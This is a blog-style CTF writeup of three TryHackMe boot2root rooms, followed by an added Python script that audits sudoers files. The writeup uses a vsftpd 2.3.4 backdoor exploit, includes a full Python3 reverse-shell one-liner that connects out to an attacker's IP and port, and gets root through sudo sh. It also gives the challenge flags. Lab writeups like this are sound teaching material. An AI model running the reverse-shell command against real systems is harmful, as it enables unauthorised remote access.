🤖Aturkreatif'24 CTF Writeup

Writeups for Aturkreatif'24 CTF

Another year of joining internal CTF~ *screams.

This time around, I pushed myself to do as many challenges as I could to see how far I've come. I managed to solve 2 B2R challenges. For the 3rd one, I solved it after the competition (because my brain had already crashed kaw kaw and I overthink a lot). Overall, it was a very nice set of challenges. Kudos to Amirul for the challenges!

Category: Boot2Root

Silent Access

Access the room here: https://tryhackme.com/r/room/aturkreatif2024ctf

First off, it's your usual recon, scanning ports and finding directories. However, as I am competitive af and want to get this done quickly, I used this tool, AutoRecon by Tib3rius (complete lifesaver). It automates directory busting, nmap scanning, etc. Super convenient!

Looks like the FTP port is open, so let's get in. List the files in FTP and there's a .txt file. Voila, we have found our first flag!

flag: 4turkr34tif24{20nra7s_7h15_15_70ur_fl@g}

Episode 2

Access the room here: https://tryhackme.com/r/room/episode2

Now this one's very interesting for me.

First, we start with our usual scanning. Using AutoRecon has really saved me time!

We see there's an open FTP port. Let's check it out.

The hint mentioned vsftpd. Google led me to this CVE, vsftpd 2.3.4 - Backdoor Command Execution.

I used this GitHub repo for my Python script (creds to the owner!)

Save the script (I used nano), then run it.

Success! Poking around, the flag was hidden in the ubuntu directory under Desktop. Gotcha!

flag: 4turkr34tif{M374spl0IT}

Bashed

Access the room here: https://tryhackme.com/r/room/bashedboot2root

This challenge made me want to bash my head (literally)(jk)(maybe).

FIRST, I highly advise that you make a directory before you do the recon part. This will make your journey so much easier later.

As usual, we did some recon with AutoRecon. For the recon part, it's advisable that you wait 20 mins so that all the directories are discovered. This is important for the next steps. Thus begins the waiting game 😎

Here's what the scanning part looks like.

Navigate through the directory created earlier. AutoRecon does nmap scans, dirbusting, all for you in a single results folder.

The results folder led me to a folder titled with our machine IP, which contains a scans folder that has another folder labelled tcp80. In tcp80, there's a .txt file related to dirbuster, so I checked the contents for possible directories to look into and exploit.

Aha! Found it!

Now that we have the link, we shall begin the process of getting the root.

Use revshells for the script crafting (I took Python3#1). Remember to use the IP from the Access part of your TryHackMe account. The port number is up to you. Here's the script:

export RHOST="[ip]";export RPORT=[port];python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Set up the listening port THEN access the web URL for the script to work.

Run the script on the website and tada~ you're in! As per the hint given, the password is the same as the name.

Run sudo -l to see what we can exploit.

Aha! There's no password on the system shell. However, we do not have root privileges yet. The best way is to use sudo sh. It allows you to run the shell with superuser privileges.

Running the cat command gave us the flag.

4turkr34tif24{qs@1345Huyajs*&*ak34fQS}
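From the defender's side, the `sudo -l` finding above comes down to a sudoers rule that lets a low-privileged account run a shell as root. The following Python script is an added example, not part of the original writeup or the challenge: it audits sudoers text for such rules. The sample content, the user names and the `SHELLS` list are assumptions, and `#include` directives and runas users are handled in a simplified way.

```python
import re

# Binaries that give an interactive shell under sudo (assumed list; extend for your fleet).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "su"}

# Constructed sample sudoers content; the user names are hypothetical.
SAMPLE = """\
Defaults env_reset
Cmnd_Alias MAINT = /usr/bin/apt, /bin/bash
webuser ALL=(ALL) NOPASSWD: /bin/sh
deploy  ALL=(root) /usr/bin/systemctl restart app, \\
        NOPASSWD: MAINT
%admin  ALL=(ALL) ALL
"""

def logical_lines(text):
    """Join backslash-continued lines, then drop comments and blank lines."""
    for raw in re.sub(r"\\\n\s*", " ", text).splitlines():
        line = raw.split("#", 1)[0].strip()  # simplification: '#include' is dropped too
        if line:
            yield line

def audit_sudoers(text):
    """Return (user, command, nopasswd) for each rule that hands out a root shell."""
    lines = list(logical_lines(text))
    aliases, findings = {}, []
    for line in lines:  # pass 1: collect Cmnd_Alias definitions
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
    for line in lines:  # pass 2: user specifications
        m = re.match(r"(\S+)\s+\S+\s*=\s*(.+)", line)
        if re.match(r"(Defaults|\w+_Alias)\b", line) or not m:
            continue
        user, specs = m.groups()
        nopasswd = False  # tags persist across the comma-separated command list
        for spec in re.sub(r"\([^)]*\)", "", specs).split(","):  # drop runas "(root)"
            for tag in re.findall(r"\b(NOPASSWD|PASSWD):", spec):
                nopasswd = tag == "NOPASSWD"
            cmd = re.sub(r"\b[A-Z_]+:\s*", "", spec).strip()
            for c in aliases.get(cmd, [cmd]):
                if c and (c == "ALL" or c.split()[0].rsplit("/", 1)[-1] in SHELLS):
                    findings.append((user, c, nopasswd))
    return findings

if __name__ == "__main__":
    for user, cmd, nopasswd in audit_sudoers(SAMPLE):
        print(f"{user}: sudo {cmd} ({'no password' if nopasswd else 'password required'})")
```

Every finding is a path to root for whoever controls that account; the `nopasswd` flag marks the ones where a web shell needs no credentials at all.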

Overall, in my opinion, these are really good challenges for beginners in boot2root as you play around with scripts to perform a reverse shell. I hope this writeup will help anyone looking to start solving b2r challenges. See ya!
